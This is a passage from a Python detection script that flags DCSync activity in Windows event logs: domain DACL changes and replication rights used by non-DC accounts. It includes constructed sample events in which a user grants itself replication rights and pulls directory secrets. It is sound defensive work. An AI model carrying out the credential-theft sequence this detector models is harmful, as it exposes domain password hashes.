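    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
DOMAIN_DNS_GUID = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # schema GUID of domainDNS
DC_ACCOUNTS = {"WIN-DC$"}  # assumption: only DCs replicate legitimately


def is_domain_object(ev):
    # 4662 reports the object class either as a name or as its schema GUID
    t = ev.get("ObjectType", "").lower()
    return t == "domaindns" or DOMAIN_DNS_GUID in t


def analyse(lines):
    """Return alerts as (rule, subject, detail) tuples from JSON event lines."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        who = ev.get("SubjectUserName", "")
        if ev.get("EventID") == 5136 and ev.get("ObjectClass") == "domainDNS" \
                and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor":
            # Granting DCSync means rewriting the DACL on the domain head
            alerts.append(("domain-dacl-changed", who, ev.get("ObjectDN", "")))
        elif ev.get("EventID") == 4662 and is_domain_object(ev):
            props = ev.get("Properties", "").lower()
            used = [n for g, n in REPL_RIGHTS.items() if g in props]
            if used and who.upper() not in DC_ACCOUNTS:
                alerts.append(("replication-by-non-dc", who, ",".join(used)))
    return alerts


# Constructed events mirroring the page: chenglei grants itself DCSync, the DC
# replicates as usual, then chenglei pulls the directory secrets.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 5136, "SubjectUserName": "chenglei", "ObjectClass": "domainDNS",
                "ObjectDN": "DC=xiaorang,DC=lab",
                "AttributeLDAPDisplayName": "nTSecurityDescriptor"}),
    json.dumps({"EventID": 4662, "SubjectUserName": "WIN-DC$",
                "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
                "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}),
    json.dumps({"EventID": 4662, "SubjectUserName": "chenglei",
                "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
                "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                              "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}),
]

if __name__ == "__main__":
    for alert in analyse(SAMPLE_EVENTS):
        print(alert)
```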
